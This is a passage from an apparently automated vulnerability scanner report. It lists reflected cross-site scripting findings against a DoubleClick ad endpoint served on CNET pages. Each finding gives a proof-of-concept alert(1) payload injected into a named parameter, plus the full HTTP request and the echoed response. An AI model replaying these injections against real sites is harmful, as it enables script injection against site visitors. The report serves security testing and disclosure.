GET /adi/N5739.cnet.comOX2308/B5345600.23;sz=300x250;pc=cbs502562;click0=http://adlog.com.com/adlog/e/r=19381&sg=502562&o=10784%253a30686%253aB266%253a9728416%253a&h=cn&p=2&b=5&l=en_USc9916'-alert(1)-'a98a38d25af&site=3&pt=8301&nd=30686&pid=&cid=20057815&pp=100&e=3&rqid=01phx1-ad-e19:4DB8789F2F30D7&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=mzakjAoOYJQAAEv5NtAAAAIY&t=2011.04.27.23.14.45&event=58/;ord=2011.04.27.23.14.45? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://news.cnet.com/8301-30686_3-20057815-266.html?tag=topStories1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:17:38 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 54545

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><SCRIPT language="JavaScript">
if(typeof(dartCallbackObjects) == "undefined")
...[SNIP]...
20%3B4307-300/250%3B41885699/41903486/1%3B%3B%7Eokv%3D%3Bpc%3Dcbs502562%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=19381&sg=502562&o=10784%253a30686%253aB266%253a9728416%253a&h=cn&p=2&b=5&l=en_USc9916'-alert(1)-'a98a38d25af&site=3&pt=8301&nd=30686&pid=&cid=20057815&pp=100&e=3&rqid=01phx1-ad-e19:4DB8789F2F30D7&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=mzakjAoOYJ
...[SNIP]...

3.131. http://ad.doubleclick.net/adi/N5739.cnet.comOX2308/B5345600.23 [l parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N5739.cnet.comOX2308/B5345600.23

Issue detail

The value of the l request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b3d52"-alert(1)-"8cd047b7e6e was submitted in the l parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adi/N5739.cnet.comOX2308/B5345600.23;sz=300x250;pc=cbs502562;click0=http://adlog.com.com/adlog/e/r=19381&sg=502562&o=10784%253a30686%253aB266%253a9728416%253a&h=cn&p=2&b=5&l=en_USb3d52"-alert(1)-"8cd047b7e6e&site=3&pt=8301&nd=30686&pid=&cid=20057815&pp=100&e=3&rqid=01phx1-ad-e19:4DB8789F2F30D7&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=mzakjAoOYJQAAEv5NtAAAAIY&t=2011.04.27.23.14.45&event=58/;ord=2011.04.27.23.14.45? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://news.cnet.com/8301-30686_3-20057815-266.html?tag=topStories1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:17:34 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 54545

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><SCRIPT language="JavaScript">
if(typeof(dartCallbackObjects) == "undefined")
...[SNIP]...
20%3B4307-300/250%3B41885699/41903486/1%3B%3B%7Eokv%3D%3Bpc%3Dcbs502562%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=19381&sg=502562&o=10784%253a30686%253aB266%253a9728416%253a&h=cn&p=2&b=5&l=en_USb3d52"-alert(1)-"8cd047b7e6e&site=3&pt=8301&nd=30686&pid=&cid=20057815&pp=100&e=3&rqid=01phx1-ad-e19:4DB8789F2F30D7&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=mzakjAoOYJ
...[SNIP]...

3.132. http://ad.doubleclick.net/adi/N5739.cnet.comOX2308/B5345600.23 [nd parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N5739.cnet.comOX2308/B5345600.23

Issue detail

The value of the nd request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f3887'-alert(1)-'475192829dd was submitted in the nd parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adi/N5739.cnet.comOX2308/B5345600.23;sz=300x250;pc=cbs502562;click0=http://adlog.com.com/adlog/e/r=19381&sg=502562&o=10784%253a30686%253aB266%253a9728416%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8301&nd=30686f3887'-alert(1)-'475192829dd&pid=&cid=20057815&pp=100&e=3&rqid=01phx1-ad-e19:4DB8789F2F30D7&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=mzakjAoOYJQAAEv5NtAAAAIY&t=2011.04.27.23.14.45&event=58/;ord=2011.04.27.23.14.45? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://news.cnet.com/8301-30686_3-20057815-266.html?tag=topStories1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:18:20 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 54548

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><SCRIPT language="JavaScript">
if(typeof(dartCallbackObjects) == "undefined")
...[SNIP]...
5690/41903477/1%3B%3B%7Eokv%3D%3Bpc%3Dcbs502562%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=19381&sg=502562&o=10784%253a30686%253aB266%253a9728416%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8301&nd=30686f3887'-alert(1)-'475192829dd&pid=&cid=20057815&pp=100&e=3&rqid=01phx1-ad-e19:4DB8789F2F30D7&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=mzakjAoOYJQAAEv5NtAAAAIY&t=2011.04
...[SNIP]...

3.133. http://ad.doubleclick.net/adi/N5739.cnet.comOX2308/B5345600.23 [nd parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N5739.cnet.comOX2308/B5345600.23

Issue detail

The value of the nd request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 55903"-alert(1)-"845905cb38 was submitted in the nd parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adi/N5739.cnet.comOX2308/B5345600.23;sz=300x250;pc=cbs502562;click0=http://adlog.com.com/adlog/e/r=19381&sg=502562&o=10784%253a30686%253aB266%253a9728416%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8301&nd=3068655903"-alert(1)-"845905cb38&pid=&cid=20057815&pp=100&e=3&rqid=01phx1-ad-e19:4DB8789F2F30D7&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=mzakjAoOYJQAAEv5NtAAAAIY&t=2011.04.27.23.14.45&event=58/;ord=2011.04.27.23.14.45? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://news.cnet.com/8301-30686_3-20057815-266.html?tag=topStories1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:18:16 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 54544

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><SCRIPT language="JavaScript">
if(typeof(dartCallbackObjects) == "undefined")
...[SNIP]...
5690/41903477/1%3B%3B%7Eokv%3D%3Bpc%3Dcbs502562%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=19381&sg=502562&o=10784%253a30686%253aB266%253a9728416%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8301&nd=3068655903"-alert(1)-"845905cb38&pid=&cid=20057815&pp=100&e=3&rqid=01phx1-ad-e19:4DB8789F2F30D7&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=mzakjAoOYJQAAEv5NtAAAAIY&t=2011.04
...[SNIP]...

3.134. http://ad.doubleclick.net/adi/N5739.cnet.comOX2308/B5345600.23 [o parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N5739.cnet.comOX2308/B5345600.23

Issue detail

The value of the o request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 22a4c"-alert(1)-"de1f191fdee was submitted in the o parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adi/N5739.cnet.comOX2308/B5345600.23;sz=300x250;pc=cbs502562;click0=http://adlog.com.com/adlog/e/r=19381&sg=502562&o=10784%253a30686%253aB266%253a9728416%253a22a4c"-alert(1)-"de1f191fdee&h=cn&p=2&b=5&l=en_US&site=3&pt=8301&nd=30686&pid=&cid=20057815&pp=100&e=3&rqid=01phx1-ad-e19:4DB8789F2F30D7&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=mzakjAoOYJQAAEv5NtAAAAIY&t=2011.04.27.23.14.45&event=58/;ord=2011.04.27.23.14.45? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://news.cnet.com/8301-30686_3-20057815-266.html?tag=topStories1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:16:37 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 54548

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><SCRIPT language="JavaScript">
if(typeof(dartCallbackObjects) == "undefined")
...[SNIP]...
19%3B0-0%3B0%3B61499020%3B4307-300/250%3B41885690/41903477/1%3B%3B%7Eokv%3D%3Bpc%3Dcbs502562%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=19381&sg=502562&o=10784%253a30686%253aB266%253a9728416%253a22a4c"-alert(1)-"de1f191fdee&h=cn&p=2&b=5&l=en_US&site=3&pt=8301&nd=30686&pid=&cid=20057815&pp=100&e=3&rqid=01phx1-ad-e19:4DB8789F2F30D7&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=&count=&ra=173.193.
...[SNIP]...

3.135. http://ad.doubleclick.net/adi/N5739.cnet.comOX2308/B5345600.23 [o parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N5739.cnet.comOX2308/B5345600.23

Issue detail

The value of the o request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4bb96'-alert(1)-'908dcb3612e was submitted in the o parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adi/N5739.cnet.comOX2308/B5345600.23;sz=300x250;pc=cbs502562;click0=http://adlog.com.com/adlog/e/r=19381&sg=502562&o=10784%253a30686%253aB266%253a9728416%253a4bb96'-alert(1)-'908dcb3612e&h=cn&p=2&b=5&l=en_US&site=3&pt=8301&nd=30686&pid=&cid=20057815&pp=100&e=3&rqid=01phx1-ad-e19:4DB8789F2F30D7&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=mzakjAoOYJQAAEv5NtAAAAIY&t=2011.04.27.23.14.45&event=58/;ord=2011.04.27.23.14.45? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://news.cnet.com/8301-30686_3-20057815-266.html?tag=topStories1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:16:40 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 54545

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><SCRIPT language="JavaScript">
if(typeof(dartCallbackObjects) == "undefined")
...[SNIP]...
19%3B1-0%3B0%3B61499020%3B4307-300/250%3B41885699/41903486/1%3B%3B%7Eokv%3D%3Bpc%3Dcbs502562%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=19381&sg=502562&o=10784%253a30686%253aB266%253a9728416%253a4bb96'-alert(1)-'908dcb3612e&h=cn&p=2&b=5&l=en_US&site=3&pt=8301&nd=30686&pid=&cid=20057815&pp=100&e=3&rqid=01phx1-ad-e19:4DB8789F2F30D7&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=&count=&ra=173.193.
...[SNIP]...

3.136. http://ad.doubleclick.net/adi/N5739.cnet.comOX2308/B5345600.23 [oepartner parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N5739.cnet.comOX2308/B5345600.23

Issue detail

The value of the oepartner request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9378a"-alert(1)-"c9b031313ac was submitted in the oepartner parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adi/N5739.cnet.comOX2308/B5345600.23;sz=300x250;pc=cbs502562;click0=http://adlog.com.com/adlog/e/r=19381&sg=502562&o=10784%253a30686%253aB266%253a9728416%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8301&nd=30686&pid=&cid=20057815&pp=100&e=3&rqid=01phx1-ad-e19:4DB8789F2F30D7&orh=cnet.com&oepartner=9378a"-alert(1)-"c9b031313ac&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=mzakjAoOYJQAAEv5NtAAAAIY&t=2011.04.27.23.14.45&event=58/;ord=2011.04.27.23.14.45? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://news.cnet.com/8301-30686_3-20057815-266.html?tag=topStories1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:19:55 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 54542

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><SCRIPT language="JavaScript">
if(typeof(dartCallbackObjects) == "undefined")
...[SNIP]...
adlog/e/r=19381&sg=502562&o=10784%253a30686%253aB266%253a9728416%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8301&nd=30686&pid=&cid=20057815&pp=100&e=3&rqid=01phx1-ad-e19:4DB8789F2F30D7&orh=cnet.com&oepartner=9378a"-alert(1)-"c9b031313ac&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=mzakjAoOYJQAAEv5NtAAAAIY&t=2011.04.27.23.14.45&event=58/";
this.clickN = "0";
this.type =
...[SNIP]...

3.137. http://ad.doubleclick.net/adi/N5739.cnet.comOX2308/B5345600.23 [oepartner parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N5739.cnet.comOX2308/B5345600.23

Issue detail

The value of the oepartner request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2cf37'-alert(1)-'450e0e876d3 was submitted in the oepartner parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adi/N5739.cnet.comOX2308/B5345600.23;sz=300x250;pc=cbs502562;click0=http://adlog.com.com/adlog/e/r=19381&sg=502562&o=10784%253a30686%253aB266%253a9728416%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8301&nd=30686&pid=&cid=20057815&pp=100&e=3&rqid=01phx1-ad-e19:4DB8789F2F30D7&orh=cnet.com&oepartner=2cf37'-alert(1)-'450e0e876d3&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=mzakjAoOYJQAAEv5NtAAAAIY&t=2011.04.27.23.14.45&event=58/;ord=2011.04.27.23.14.45? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://news.cnet.com/8301-30686_3-20057815-266.html?tag=topStories1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:19:58 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 54542

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><SCRIPT language="JavaScript">
if(typeof(dartCallbackObjects) == "undefined")
...[SNIP]...
adlog/e/r=19381&sg=502562&o=10784%253a30686%253aB266%253a9728416%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8301&nd=30686&pid=&cid=20057815&pp=100&e=3&rqid=01phx1-ad-e19:4DB8789F2F30D7&orh=cnet.com&oepartner=2cf37'-alert(1)-'450e0e876d3&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=mzakjAoOYJQAAEv5NtAAAAIY&t=2011.04.27.23.14.45&event=58/http://www.blackberry.com">
...[SNIP]...

3.138. http://ad.doubleclick.net/adi/N5739.cnet.comOX2308/B5345600.23 [orh parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N5739.cnet.comOX2308/B5345600.23

Issue detail

The value of the orh request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8f0ad'-alert(1)-'2732c1fdd68 was submitted in the orh parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adi/N5739.cnet.comOX2308/B5345600.23;sz=300x250;pc=cbs502562;click0=http://adlog.com.com/adlog/e/r=19381&sg=502562&o=10784%253a30686%253aB266%253a9728416%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8301&nd=30686&pid=&cid=20057815&pp=100&e=3&rqid=01phx1-ad-e19:4DB8789F2F30D7&orh=cnet.com8f0ad'-alert(1)-'2732c1fdd68&oepartner=&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=mzakjAoOYJQAAEv5NtAAAAIY&t=2011.04.27.23.14.45&event=58/;ord=2011.04.27.23.14.45? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://news.cnet.com/8301-30686_3-20057815-266.html?tag=topStories1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:19:45 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 54542

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><SCRIPT language="JavaScript">
if(typeof(dartCallbackObjects) == "undefined")
...[SNIP]...
og.com.com/adlog/e/r=19381&sg=502562&o=10784%253a30686%253aB266%253a9728416%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8301&nd=30686&pid=&cid=20057815&pp=100&e=3&rqid=01phx1-ad-e19:4DB8789F2F30D7&orh=cnet.com8f0ad'-alert(1)-'2732c1fdd68&oepartner=&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=mzakjAoOYJQAAEv5NtAAAAIY&t=2011.04.27.23.14.45&event=58/http://www.blackberry.com">
...[SNIP]...

3.139. http://ad.doubleclick.net/adi/N5739.cnet.comOX2308/B5345600.23 [orh parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N5739.cnet.comOX2308/B5345600.23

Issue detail

The value of the orh request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ce5d5"-alert(1)-"1bfb13a346d was submitted in the orh parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adi/N5739.cnet.comOX2308/B5345600.23;sz=300x250;pc=cbs502562;click0=http://adlog.com.com/adlog/e/r=19381&sg=502562&o=10784%253a30686%253aB266%253a9728416%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8301&nd=30686&pid=&cid=20057815&pp=100&e=3&rqid=01phx1-ad-e19:4DB8789F2F30D7&orh=cnet.comce5d5"-alert(1)-"1bfb13a346d&oepartner=&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=mzakjAoOYJQAAEv5NtAAAAIY&t=2011.04.27.23.14.45&event=58/;ord=2011.04.27.23.14.45? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://news.cnet.com/8301-30686_3-20057815-266.html?tag=topStories1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:19:41 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 54542

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><SCRIPT language="JavaScript">
if(typeof(dartCallbackObjects) == "undefined")
...[SNIP]...
og.com.com/adlog/e/r=19381&sg=502562&o=10784%253a30686%253aB266%253a9728416%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8301&nd=30686&pid=&cid=20057815&pp=100&e=3&rqid=01phx1-ad-e19:4DB8789F2F30D7&orh=cnet.comce5d5"-alert(1)-"1bfb13a346d&oepartner=&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=mzakjAoOYJQAAEv5NtAAAAIY&t=2011.04.27.23.14.45&event=58/";
this.clickN = "0";

...[SNIP]...

3.140. http://ad.doubleclick.net/adi/N5739.cnet.comOX2308/B5345600.23 [p parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N5739.cnet.comOX2308/B5345600.23

Issue detail

The value of the p request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2b324'-alert(1)-'1aa36b96c8d was submitted in the p parameter. This input was echoed unmodified in the application's response.

